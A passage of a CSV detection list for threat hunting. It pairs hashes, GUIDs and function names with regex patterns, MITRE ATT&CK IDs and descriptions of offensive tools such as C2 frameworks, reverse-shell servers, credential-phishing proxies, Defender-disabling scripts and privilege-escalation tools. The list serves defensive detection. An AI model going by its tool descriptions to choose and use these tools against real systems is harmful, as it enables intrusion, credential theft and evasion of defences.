- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*",".{0,1000}A7AD39B5\-9BA1\-48A9\-B928\-CA25FDD8F31F.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092*",".{0,1000}a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79*",".{0,1000}a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c*",".{0,1000}a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee*",".{0,1000}a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f*",".{0,1000}a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c*",".{0,1000}a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990*",".{0,1000}a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db*",".{0,1000}a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc*",".{0,1000}a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7*",".{0,1000}a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c*",".{0,1000}a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0*",".{0,1000}a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb*",".{0,1000}a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*",".{0,1000}A8FE1F5C\-6B2A\-4417\-907F\-4F6EDE9C15A3.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a*",".{0,1000}a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058*",".{0,1000}a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9*",".{0,1000}a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67*",".{0,1000}a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357*",".{0,1000}a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f*",".{0,1000}a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99*",".{0,1000}a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 
- TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039*",".{0,1000}a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916*",".{0,1000}a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40*",".{0,1000}a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651*",".{0,1000}a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A9EAA820-EC72-4052-80D0-A2CCBFCC83E6*",".{0,1000}A9EAA820\-EC72\-4052\-80D0\-A2CCBFCC83E6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714*",".{0,1000}a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2*",".{0,1000}aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c*",".{0,1000}aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*aa3939fc357723135870d5036b12a67097b03309*",".{0,1000}aa3939fc357723135870d5036b12a67097b03309.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285*",".{0,1000}aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*AA488748-3D0E-4A52-8747-AB42A7143760*",".{0,1000}AA488748\-3D0E\-4A52\-8747\-AB42A7143760.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e*",".{0,1000}aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*",".{0,1000}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw==*",".{0,1000}AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw\=\=.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*",".{0,1000}AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*AAB4D641-C310-4572-A9C2-6D12593AB28E*",".{0,1000}AAB4D641\-C310\-4572\-A9C2\-6D12593AB28E.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b*",".{0,1000}aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*AAB75969-92BA-4632-9F78-AF52FA2BCE1E*",".{0,1000}AAB75969\-92BA\-4632\-9F78\-AF52FA2BCE1E.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*aacf6ed6e4b999a6338d5a025350ea5a*",".{0,1000}aacf6ed6e4b999a6338d5a025350ea5a.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669*",".{0,1000}aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*AAP-AddToHighPrivilegePrincipalMap*",".{0,1000}AAP\-AddToHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-CheckIfMemberOfPrivilegedDirectoryRole*",".{0,1000}AAP\-CheckIfMemberOfPrivilegedDirectoryRole.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" 
"*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*",".{0,1000}AAP\-DisplayApplicableMFAConditionalAccessPolicyForUserID.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-DisplayHighPrivilegePrincipalMap*",".{0,1000}AAP\-DisplayHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-DisplayNonHighPrivilegedRoleAssignments*",".{0,1000}AAP\-DisplayNonHighPrivilegedRoleAssignments.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*",".{0,1000}AAP\-GetHighPrivilegedDirectoryRoleTemplateMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" 
